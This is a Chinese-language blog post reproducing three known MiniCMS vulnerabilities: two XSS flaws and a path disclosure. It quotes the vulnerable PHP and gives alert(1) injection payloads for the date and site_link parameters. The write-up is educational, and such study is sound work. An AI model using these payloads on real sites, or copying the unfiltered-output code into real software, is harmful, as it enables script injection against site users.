<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.6.2" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.6.2" type="image/png" sizes="32x32"><link rel="apple-touch-icon" href="/images/icons/apple-touch-icon.png?v=2.6.2" sizes="180x180"><meta name="description" content="安全小白的第一次动手漏洞复现。">
<meta property="og:type" content="article">
<meta property="og:title" content="MiniCMS漏洞复现（一）">
<meta property="og:url" content="http://example.com/2021/11/12/MiniCMS-first/index.html">
<meta property="og:site_name" content="晚安">
<meta property="og:description" content="安全小白的第一次动手漏洞复现。">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2021/11/12/MiniCMS-first/%5CMiniCMS-first%5Ccve-2018-1000638.png">
<meta property="og:image" content="http://example.com/2021/11/12/MiniCMS-first/%5CMiniCMS-first%5Ccve-2018-1000638_show.png">
<meta property="og:image" content="http://example.com/2021/11/12/MiniCMS-first/%5CMiniCMS-first%5Ccve-2018-10227_show1.png">
<meta property="og:image" content="http://example.com/2021/11/12/MiniCMS-first/%5CMiniCMS-first%5Ccve-2018-10227_show2.png">
<meta property="og:image" content="http://example.com/2021/11/12/MiniCMS-first/%5CMiniCMS-first%5Ccve-2018-10424.png">
<meta property="article:published_time" content="2021-11-12T10:02:33.000Z">
<meta property="article:modified_time" content="2021-11-24T08:06:15.161Z">
<meta property="article:author" content="W4ngch3n">
<meta property="article:tag" content="MiniCMS">
<meta property="article:tag" content="XSS">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2021/11/12/MiniCMS-first/%5CMiniCMS-first%5Ccve-2018-1000638.png"><title>MiniCMS漏洞复现（一） | 晚安</title><link ref="canonical" href="http://example.com/2021/11/12/MiniCMS-first/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.6.2"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"Copy","copySuccess":"Copy Success","copyError":"Copy Error"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 5.4.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">Home</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">Archives</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">Categories</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">Tags</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/about/"><span class="header-nav-menu-item__icon"><i class="fas fa-about"></i></span><span class="header-nav-menu-item__text">About</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">晚安</div><div class="header-banner-info__subtitle"> 还我月亮。</div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">MiniCMS漏洞复现（一）</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">Created</span><span class="post-meta-item__value">2021-11-12</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">Updated</span><span class="post-meta-item__value">2021-11-24</span></span></div></header><div class="post-body"><p>安全小白的第一次动手漏洞复现。</p>
<span id="more"></span>


        <h2 id="简介">
          <a href="#简介" class="heading-link"><i class="fas fa-link"></i></a><a href="#简介" class="headerlink" title="简介"></a>简介</h2>
      <p>MiniCMS是一个针对个人网站设计的微型CMS。它的特点是：</p>
<ol>
<li>不需要数据库在支持，只需要一个可以运行PHP的Web环境。</li>
<li>只针对个人网站设计，没有复杂的成员管理和权限设置。</li>
<li>没有分类只有标签，免除发布文章时到底该怎么分类的纠结。</li>
<li>只有“文章”和“页面”两该个系统，没有“评论”、“插件”、“主题”，让你更专注于创造内容。</li>
</ol>
<p>项目地址：<span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://github.com/bg5sbk/MiniCMS">https://github.com/bg5sbk/MiniCMS</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>

        <h2 id="CVE复现">
          <a href="#CVE复现" class="heading-link"><i class="fas fa-link"></i></a><a href="#CVE复现" class="headerlink" title="CVE复现"></a>CVE复现</h2>
      
        <h3 id="CVE-2018-1000638-反射型XSS">
          <a href="#CVE-2018-1000638-反射型XSS" class="heading-link"><i class="fas fa-link"></i></a><a href="#CVE-2018-1000638-反射型XSS" class="headerlink" title="CVE-2018-1000638 反射型XSS"></a>CVE-2018-1000638 反射型XSS</h3>
      <p><strong>存在位置：</strong>/MiniCMS-master/mc-admin/page.php处date参数存在XSS漏洞。</p>
<p>找到传参点：</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;date&#x27;</span>]))</span><br><span class="line"></span><br><span class="line"> <span class="variable">$filter_date</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;date&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">else</span></span><br><span class="line"></span><br><span class="line"> <span class="variable">$filter_date</span> = <span class="string">&#x27;&#x27;</span>;</span><br></pre></td></tr></table></div></figure>

<p>这里GET传入了date参数，而后没有进行任何过滤处理直接插入到前端代码中，且不止一处。</p>
<p><img src="/2021/11/12/MiniCMS-first/%5CMiniCMS-first%5Ccve-2018-1000638.png"></p>
<p>因此，此处可以构造语句进行XSS攻击，构造语句如下：</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?date=<span class="string">&quot;&gt;&lt;/a&gt;&lt;img%20src=1%20onerror=alert(1)&gt;&lt;a&gt;</span></span><br></pre></td></tr></table></div></figure>

<p><strong>效果：</strong></p>
<p><img src="/2021/11/12/MiniCMS-first/%5CMiniCMS-first%5Ccve-2018-1000638_show.png"></p>

        <h3 id="CVE-2018-10227-存储型XSS">
          <a href="#CVE-2018-10227-存储型XSS" class="heading-link"><i class="fas fa-link"></i></a><a href="#CVE-2018-10227-存储型XSS" class="headerlink" title="CVE-2018-10227 存储型XSS"></a>CVE-2018-10227 存储型XSS</h3>
      <p><strong>存在位置：</strong>/MiniCMS-master/MiniCMS-master/mc-admin/conf.php 在设置中修改网站地址处存在XSS漏洞，可直接存储XSS payload。</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;save&#x27;</span>])) &#123;</span><br><span class="line">  <span class="variable">$user_name_changed</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;user_name&#x27;</span>] != <span class="variable">$mc_config</span>[<span class="string">&#x27;user_name&#x27;</span>];</span><br><span class="line">  </span><br><span class="line">  <span class="variable">$mc_config</span>[<span class="string">&#x27;site_name&#x27;</span>] = <span class="variable">$_POST</span>[<span class="string">&#x27;site_name&#x27;</span>];</span><br><span class="line">  <span class="variable">$mc_config</span>[<span class="string">&#x27;site_desc&#x27;</span>] = <span class="variable">$_POST</span>[<span class="string">&#x27;site_desc&#x27;</span>];</span><br><span class="line">  <span class="variable">$mc_config</span>[<span class="string">&#x27;site_link&#x27;</span>] = <span class="variable">$_POST</span>[<span class="string">&#x27;site_link&#x27;</span>];</span><br><span class="line">  <span class="variable">$mc_config</span>[<span class="string">&#x27;user_nick&#x27;</span>] = <span class="variable">$_POST</span>[<span class="string">&#x27;user_nick&#x27;</span>];</span><br><span class="line">  <span class="variable">$mc_config</span>[<span class="string">&#x27;user_name&#x27;</span>] = <span class="variable">$_POST</span>[<span class="string">&#x27;user_name&#x27;</span>];</span><br><span class="line">  <span class="variable">$mc_config</span>[<span class="string">&#x27;comment_code&#x27;</span>] = get_magic_quotes_gpc() ? stripslashes(trim(<span class="variable">$_POST</span>[<span class="string">&#x27;comment_code&#x27;</span>])) : trim(<span class="variable">$_POST</span>[<span class="string">&#x27;comment_code&#x27;</span>]);</span><br><span class="line">  </span><br><span class="line">  <span class="keyword">if</span> (<span class="variable">$_POST</span>[<span class="string">&#x27;user_pass&#x27;</span>] != <span class="string">&#x27;&#x27;</span>)</span><br><span class="line">    <span class="variable">$mc_config</span>[<span class="string">&#x27;user_pass&#x27;</span>] = <span class="variable">$_POST</span>[<span class="string">&#x27;user_pass&#x27;</span>];</span><br><span class="line"></span><br><span class="line">  <span class="variable">$code</span> = <span class="string">&quot;&lt;?php\n\$mc_config = &quot;</span>.var_export(<span class="variable">$mc_config</span>, <span class="literal">true</span>).<span class="string">&quot;\n?&gt;&quot;</span>;</span><br><span class="line">  </span><br><span class="line">  file_put_contents(<span class="string">&#x27;../mc-files/mc-conf.php&#x27;</span>, <span class="variable">$code</span>);</span><br></pre></td></tr></table></div></figure>

<p>conf.php中进行设置的更改，对于site_link参数没有进行过滤处理直接写入了mc-conf.php，虽然在下面出现了过滤性输出：</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;div class=&quot;field&quot;&gt;</span><br><span class="line">      &lt;div class=&quot;label&quot;&gt;网站地址&lt;/div&gt;</span><br><span class="line">      &lt;input class=&quot;textbox&quot; type=&quot;text&quot; name=&quot;site_link&quot; value=&quot;&lt;?php echo htmlspecialchars($site_link); ?&gt;&quot; /&gt;</span><br><span class="line">      &lt;div class=&quot;info&quot;&gt;&lt;/div&gt;</span><br><span class="line">    &lt;/div&gt;</span><br></pre></td></tr></table></div></figure>

<p>但是在head.php中没有使用<code>htmlspecialchars</code>进行过滤，直接将<code>mc_config[&#39;site_link&#39;]</code>输出给了前端，看到后面site_name中有进行过滤处理，怀疑是开发人员的疏忽导致的。</p>
<p><strong>构造语句：</strong></p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//localhost/MiniCMS&quot;&gt;&lt;/a&gt;&lt;img src=1 onerror=alert(1)&gt;&lt;a&gt;</span></span><br></pre></td></tr></table></div></figure>

<p><strong>效果：</strong></p>
<p><img src="/2021/11/12/MiniCMS-first/%5CMiniCMS-first%5Ccve-2018-10227_show1.png"></p>
<p><img src="/2021/11/12/MiniCMS-first/%5CMiniCMS-first%5Ccve-2018-10227_show2.png" alt="cve-2018-10227_show2"></p>

        <h3 id="CVE-2018-10424-物理路径泄露">
          <a href="#CVE-2018-10424-物理路径泄露" class="heading-link"><i class="fas fa-link"></i></a><a href="#CVE-2018-10424-物理路径泄露" class="headerlink" title="CVE-2018-10424 物理路径泄露"></a>CVE-2018-10424 物理路径泄露</h3>
      <p><strong>存在位置：</strong>/MiniCMS-master/mc-admin/post-edit.php处将GET的参数id改为不存在的文件名，会爆出物理地址。</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>])) &#123;</span><br><span class="line">  <span class="variable">$file_path</span> = <span class="string">&#x27;../mc-files/posts/data/&#x27;</span>.<span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>].<span class="string">&#x27;.dat&#x27;</span>;</span><br><span class="line">  </span><br><span class="line">  <span class="variable">$data</span> = unserialize(file_get_contents(<span class="variable">$file_path</span>));</span><br><span class="line">  </span><br><span class="line">  <span class="variable">$post_id</span>      = <span class="variable">$data</span>[<span class="string">&#x27;id&#x27;</span>];</span><br><span class="line">  <span class="variable">$post_state</span>   = <span class="variable">$data</span>[<span class="string">&#x27;state&#x27;</span>];</span><br><span class="line">  <span class="variable">$post_title</span>   = <span class="variable">$data</span>[<span class="string">&#x27;title&#x27;</span>];</span><br><span class="line">  <span class="variable">$post_content</span> = <span class="variable">$data</span>[<span class="string">&#x27;content&#x27;</span>];</span><br><span class="line">  <span class="variable">$post_tags</span>    = <span class="variable">$data</span>[<span class="string">&#x27;tags&#x27;</span>];</span><br><span class="line">  <span class="variable">$post_date</span>    = <span class="variable">$data</span>[<span class="string">&#x27;date&#x27;</span>];</span><br><span class="line">  <span class="variable">$post_time</span>    = <span class="variable">$data</span>[<span class="string">&#x27;time&#x27;</span>];</span><br><span class="line">  <span class="variable">$post_can_comment</span> = <span class="keyword">isset</span>(<span class="variable">$data</span>[<span class="string">&#x27;can_comment&#x27;</span>]) ? <span class="variable">$data</span>[<span class="string">&#x27;can_comment&#x27;</span>] : <span class="string">&#x27;1&#x27;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>

<p>这里传参数<code>id</code>，前端会输出对应的id的文章内容，如果输入的id不存在则会报错，直接爆出物理地址。</p>
<p><img src="/2021/11/12/MiniCMS-first/%5CMiniCMS-first%5Ccve-2018-10424.png"></p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ END ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">Author: </span><span class="copyright-author__value"><a href="http://example.com">W4ngch3n</a></span></div><div class="copyright-link"><span class="copyright-link__name">Link: </span><span class="copyright-link__value"><a href="http://example.com/2021/11/12/MiniCMS-first/">http://example.com/2021/11/12/MiniCMS-first/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">Copyright: </span><span class="copyright-notice__value">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> unless stating additionally</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="http://example.com/tags/MiniCMS/">MiniCMS</a></span><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="http://example.com/tags/XSS/">XSS</a></span></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2021/11/22/MiniCMS-2/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">MiniCMS漏洞复现（二）</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2019/01/24/MCM/"><span class="paginator-prev__text">美赛赛前的一些准备和注意事项</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">Catalog</span><span class="sidebar-nav-ov">Overview</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AE%80%E4%BB%8B"><span class="toc-number">1.</span> <span class="toc-text">
          简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CVE%E5%A4%8D%E7%8E%B0"><span class="toc-number">2.</span> <span class="toc-text">
          CVE复现</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2018-1000638-%E5%8F%8D%E5%B0%84%E5%9E%8BXSS"><span class="toc-number">2.1.</span> <span class="toc-text">
          CVE-2018-1000638 反射型XSS</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2018-10227-%E5%AD%98%E5%82%A8%E5%9E%8BXSS"><span class="toc-number">2.2.</span> <span class="toc-text">
          CVE-2018-10227 存储型XSS</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2018-10424-%E7%89%A9%E7%90%86%E8%B7%AF%E5%BE%84%E6%B3%84%E9%9C%B2"><span class="toc-number">2.3.</span> <span class="toc-text">
          CVE-2018-10424 物理路径泄露</span></a></li></ol></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/images/icons/safari-pinned-tab.svg" alt="avatar"></div><p class="sidebar-ov-author__text">W4ngch3n</p></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">5</div><div class="sidebar-ov-state-item__name">Archives</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--categories" href="/categories/"><div class="sidebar-ov-state-item__count">3</div><div class="sidebar-ov-state-item__name">Categories</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">6</div><div class="sidebar-ov-state-item__name">Tags</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="Creative Commons" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">You have read </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2021</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>W4ngch3n</span></div><div><span>Powered by <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a></span><span> v5.4.0</span><span class="footer__devider">|</span><span>Theme - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.6.2</span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="/js/utils.js?v=2.6.2"></script><script src="/js/stun-boot.js?v=2.6.2"></script><script src="/js/scroll.js?v=2.6.2"></script><script src="/js/header.js?v=2.6.2"></script><script src="/js/sidebar.js?v=2.6.2"></script></body></html>